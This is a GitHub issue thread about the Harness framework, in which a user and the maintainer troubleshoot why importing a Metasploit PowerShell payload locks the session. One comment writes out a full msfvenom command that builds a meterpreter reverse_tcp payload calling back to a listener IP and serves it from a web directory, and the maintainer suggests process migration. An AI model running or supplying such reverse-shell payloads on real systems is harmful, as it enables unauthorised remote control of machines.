### ISSUE TITLE
how to get out without killing the framework

### ISSUE THREAD

**Issue by amainyebriggs** [Rich5/Harness#3]
how do i get out after importing a module because when i import a metasploit payload.ps1
it just rename their except i ctrl ^c and the framework will close and the session on msfconsole dies

**Comment by Rich5** [comment]
I don't quite understand what you're asking. Can you provide a few more details? What is in payload.ps1? If you're in a harness session and type ctrl-c you will kill the entire program. If you execute a ps1 file and it hangs you probably just killed your sessions because the shell will never return from that last command. With more details I can try to recreate the issue and provide more help.

**Comment by amainyebriggs** [comment]
i import metasploit powershell payload

**Comment by Rich5** [comment]
Please detail step by step what you are trying to do.

**Comment by amainyebriggs** [comment]
i started harnness listener and executed my payload on my windows system 
now i have a session on harness 
i  generated a payload using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.107.49.83 lport=4478 -f psh -o /var/www/html/s.ps1
 and i imported  ^import-module /var/www/html/s.ps1  i did that on harness framework
 and i cannot import other payloads until i close the other import with ctrl^c 
and when i do that the framework dies and the session on msfconsole also dies

**Comment by Rich5** [comment]
I see. So when you execute the msf payload it's running in the same context as the process harness is running in. So you effectively gave control of the harness process to the new payload. You can try migrating meterpreter to a new process and see if the frees up the harness payload.

**Comment by amainyebriggs** [comment]
okay i will try migrating thanks
it may not work because i spawn a new process in cobalt 3.0 and it was still the same in harness

**Comment by Rich5** [comment]
Let me know and I'll try to recreate. Probably won't get around to fully testing until next week.

**Comment by amainyebriggs** [comment]
okay thanks

**Comment by Rich5** [comment]
Any updates? If not I'll close this issue by the end of the day.

**Comment by amainyebriggs** [comment]
kk
